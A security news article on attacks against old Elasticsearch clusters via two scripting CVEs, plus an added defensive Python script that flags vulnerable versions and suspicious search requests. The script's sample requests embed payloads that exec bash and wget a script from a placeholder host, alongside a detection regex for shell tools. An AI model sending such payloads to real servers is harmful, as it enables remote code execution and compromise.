Malware

Elasticsearch versions 1.4.2 and earlier vulnerable to malware infections

Two old vulnerabilities were exploited, allegedly by Chinese hackers

Cisco's network security and ethical hacking teams recently detected intrusions in which malicious hackers target Elasticsearch clusters and exploit previously reported vulnerabilities to carry out various malicious actions, such as malware injection and cryptocurrency mining, reported experts from the International Institute of Cyber Security.

“Hackers are attacking users in versions 1.4.2
and earlier,” the network security experts mentioned, after posting a report of
the activity detected by a honeypot.

Given the attack techniques used, the experts believe this group of hackers could be operating from China. The attack exploited two vulnerabilities, disclosed in 2014 and 2015, that allow scripts to be passed inside search queries; this gave the attackers operating-system access to the outdated hosts, on which they then deployed their payload. Elasticsearch 1.4.2 was released at the end of 2014.

“The 2014 vulnerability (CVE-2014-3120) allows attackers to execute arbitrary MVEL
expressions, while the 2015 vulnerability (CVE-2015-1427)
allows hackers to bypass sandbox
environments to run arbitrary shell commands through a complex script,” network
security experts mention.

Security teams added: “The first payload
delivered invokes wget to download a bash script, while the second uses a
confusing JavaScript to invoke bash and download the same script with wget.
This is probably an attempt to make the exploit functional on multiple
platforms.”
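The two quotes above give everything a defender needs to triage a 1.x cluster: the affected version ranges and the shape of the payloads (an inline script in a _search request that reaches the OS through Runtime/bash/wget). The following script is an added example written for this article, not code from Cisco Talos, Elastic or the article's authors. It reports which of the two CVEs a version banner is exposed to, using the ranges from the public advisories (CVE-2014-3120 before 1.2.0; CVE-2015-1427 in 1.3.0 to 1.3.7 and 1.4.0 to 1.4.2), and scans logged _search requests for scripts that try to leave the JVM. The sample requests are constructed for the example, and the hostname example.invalid is a placeholder, not attacker infrastructure.

```python
"""Triage helper for the two Elasticsearch 1.x scripting bugs named above.

Added example for this article, not code from Cisco Talos or Elastic.
  1. exposed_cves(): given a node's version banner, list which of the two
     CVEs its affected range covers (ranges from the public advisories).
  2. scan_request(): inspect one logged _search request, as a honeypot or
     reverse proxy would record it, for scripts that try to reach the OS.
All sample requests are constructed for the example; example.invalid is a
placeholder hostname, not the attackers' infrastructure.
"""
import json
import re
from urllib.parse import parse_qs, quote, urlparse


def parse_version(version):
    """'1.4.2' -> (1, 4, 2); a suffix such as '-SNAPSHOT' is ignored."""
    return tuple(int(p) for p in version.split("-")[0].split("."))


def exposed_cves(version):
    v = parse_version(version)
    cves = []
    if v < (1, 2, 0):                      # dynamic MVEL scripting on by default
        cves.append("CVE-2014-3120")
    if (1, 3, 0) <= v < (1, 3, 8) or (1, 4, 0) <= v < (1, 4, 3):
        cves.append("CVE-2015-1427")       # Groovy sandbox bypass, fixed in 1.3.8 / 1.4.3
    return cves


# Strings a search-time script should never need: they mean the script is
# leaving the JVM for the shell, which is what both reported payloads did.
OS_EXEC = re.compile(
    r"java\.lang\.Runtime|getRuntime\(\)|ProcessBuilder|\b(?:wget|curl|bash|/bin/sh)\b",
    re.IGNORECASE,
)


def iter_scripts(node):
    """Yield (lang, source) for every inline script anywhere in a query body.

    1.x accepts scripts in script_fields, script filters, sorts and facets,
    so walk the whole document instead of hard-coding one location.
    """
    if isinstance(node, dict):
        if isinstance(node.get("script"), str):
            yield node.get("lang", "default"), node["script"]
        for child in node.values():
            yield from iter_scripts(child)
    elif isinstance(node, list):
        for child in node:
            yield from iter_scripts(child)


def scan_request(path, body=""):
    """Return {'scripts': n, 'langs': [...], 'os_exec': [...]} for one request."""
    url = urlparse(path)
    findings = {"scripts": 0, "langs": [], "os_exec": []}
    if not url.path.endswith("/_search"):
        return findings
    # CVE-2014-3120 was reachable through the ?source= parameter as well as the body.
    candidates = [body] + parse_qs(url.query).get("source", [])
    for text in candidates:
        try:
            doc = json.loads(text)
        except ValueError:
            continue                        # empty or non-JSON: nothing to scan
        for lang, src in iter_scripts(doc):
            findings["scripts"] += 1
            if lang not in findings["langs"]:
                findings["langs"].append(lang)
            if OS_EXEC.search(src):
                findings["os_exec"].append(src)
    return findings


# Constructed sample traffic (not captured data): one benign query, then the
# two payload shapes the report describes (wget dropper; bash invoking wget).
DROPPER = "http://example.invalid/x.sh"
SAMPLE_REQUESTS = [
    ("/_search", json.dumps({"script_fields": {"twice": {
        "lang": "groovy", "script": "doc['price'].value * 2"}}})),
    ("/_search", json.dumps({"size": 1, "script_fields": {"cmd": {
        "lang": "groovy",
        "script": 'java.lang.Runtime.getRuntime().exec("bash -c \'wget %s\'").text' % DROPPER}}})),
    ("/logs/_search?source=" + quote(json.dumps({"script_fields": {"x": {
        "script": 'import java.io.*; Runtime.getRuntime().exec("wget %s")' % DROPPER}}})), ""),
]


def scan_samples():
    return [scan_request(path, body) for path, body in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for (path, _), result in zip(SAMPLE_REQUESTS, scan_samples()):
        verdict = "ALERT" if result["os_exec"] else "ok"
        print(f"{verdict:5} {path[:40]:40} scripts={result['scripts']} langs={result['langs']}")
```

The detector deliberately walks the whole request body rather than looking only at script_fields, because 1.x also accepts scripts in filters, sorts and facets, and it checks the ?source= query parameter because the 2014 bug was reachable that way. The fix the version check points to is an upgrade to 1.3.8 or 1.4.3; on a node that cannot be upgraded, setting script.disable_dynamic: true in elasticsearch.yml turns off inline scripting, which removes the attack surface both CVEs depend on.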

A Cisco spokesperson described some of the outcomes observed in this campaign: “We have encountered cases of denial-of-service (DoS) attacks, cryptocurrency mining, and attempts to integrate compromised systems to botnets”.

Although the experts did not explicitly attribute the attack to Chinese hacker groups, their report notes that the numeric ID of an account on the Chinese social network QQ appeared in one of the commands executed by one of the attack's payloads.

“We analyzed the public account activity of
952135763 and found several posts related to cybersecurity and exploiting
vulnerabilities, although we found nothing related to this particular attack.
Although these details could provide information to find the hackers
responsible for the attack, we do not yet have enough information to know the
attackers,” the experts concluded.
